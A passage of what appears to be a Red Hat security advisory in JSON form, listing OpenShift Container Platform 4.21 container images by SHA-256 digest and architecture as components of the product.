"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:2125f95e12d8c30d743da09f3f8451e70a7b0cd8299b173f748a4affd1aab940_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:42c14c3b43aa86ab4a94d86b737ce7eea32703c70db0a5f0e9ac13f9a8f385cf_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:fe5f92c1647f1b8a6d7c25f4b11bbf310b7f9c2003d9fd8d9659108114330054_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:24b98a6e4bc5f0edd37fcb1a0aefa809cc95d50a22da8059c3a8a6811d1596ad_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:27d6d5aea37e0e535d3db14419f53b898251476c64e9f41f00d2afc308d22293_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:4d0e4a3e50a3bac437c4960c0a079d2148fb8dab6655a761b1d10a1c653633b1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6c4e49d812a40fa01b187bce2d2f6060df10a06ddb248469465c53c6e8c01415_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:2bcdce58a9dec8306ea7ec58ed588c6def1d0e2891d06b91661cb04a1411242f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:493c047ca44c43a15896612c8df60ed0e65017435c57e5cad41a9ee23b275e71_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:6427135ca011b5cc6539000ab9d3bd9e2d68c7703d1e50423d01a88d8ed90fc6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:b33e8c16ab733fb79f0f690e0288f40e9bf8e03a7477b35120dcd29475fb9310_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:53e8fcbba44d9c73eb93da4c101562634f44646eafb544d4c711431b409ff825_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:73223d1dcb0b0d07decc32ba99eb6875597c1fac474c6c9368f75ef12e342e4d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:809e1636777dcaaa79d79c5edb76ff243ca743fa119a4988b3ac8b9222d3ba3f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cli-rhel9@sha256:981dfbf55ceaaaca41ec375ff1a95db0409f443ed70dc84859545af82668280c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:197df56874e5b85f148dec36d644749d5e1c39e262737beab0fa2f866749876f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:9705094f22d110094312ff158c6fe6576de45d5119f3f236608831fb286e953b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:b710c08d2b2cee582d55d2bb5829b0d35375e04c88a1d2e9b7cef725212d0cba_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:d0c4572792d7337fe9ce11cdd9000ebc8d86b345bc7e8dcb6b2718ad3439c6fe_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:1746abd22482e0307a612a4832326e681ecb67358723df137b076bf13dbe638d_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:8fecae242c9d6ef4ea859bbb68219912ce75735c53b350ddca2ef230c1dc17af_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:da2bd0d6afdcf81c37f95aba0ea52d4ee063710a49bf399938ba8dca10f079ef_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:edbe1d6b65c67df5cc6822fc0138938ca4266c792d8dedd8121dc88648d72a16_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:3f4231f318f661de982c522ecc26a6e35a1728e12b68d84ae32641fb41ac0ce0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:6a19d1ab1ae1c3a8cd270e3b90ba8631d8342688f9111e7eb05d6d5e7b9c7e0e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:97c43c0d0949b12333e19892c20232f1db9e9a4400022b13ce628e20398b1b83_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:eaac0e5ca6347913022442f309e559ad953f5f92ba6c6ebd545e276b229d75fb_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:217f0c7a5cae2b5d399977054083acbe87ad4005f7471eb76d6290cd1ec98217_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:92f8b02f0ea036b3630d44820aefc84c9853f218fc679b9750c088cc4f07c1af_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a7515b3ad53a0ac77da9d16a60b50e43385784930e96d5545094c7019607f95f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:c19b3af8649a3add22233266845553734d949453ad4095426e79ab373528bdd1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1432f3b24284b174dd6c69fc6170eb2952ddd29d8eeb976911c5f0ddb3e2e21b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:15dfa677bfa8066eaf05de566e02ed341900558be9d384b9face40216889730e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:1ca76b4d5aa455cef111e3ea31cc16eafe26a6c3ed6a9f4111e66e2088a5b3de_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:c6ac4b0406087730cb3689049a5322f057cb7f6e2caf6f39dee68baa115cc85b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:148d7bf1e8d2f5a7b853e257ed30aec67b9d684316756b8593d1f31a2ab0d593_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:47a0e0bcec249f6ed2003797f66ce095128fb8115326a7d0ef41d528e2445213_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:66b6fd4e62537ca3252f72fad3807c10bb3d32dcc535e84f7c80d7cca1f12cf3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9463ca409614b7d8fe425b0792a1faa34cf43d3397dbf00ddf05b13997cd8ba6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:16d3fcd0bbbd77893146ff2ff66f2b56ef1e23f0a478e506e52b8c3481f45c4b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64 as a component of Red Hat OpenShift Container Platform 4.21",
"product_id": "Red Hat OpenShift Container Platform 4.21:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:70ece97f4bde794353c6e71255874b17d3af77b1a4d2283460b7188a495c782c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.21"
},
{
"category": "default_component_of",
"full_product_name": {
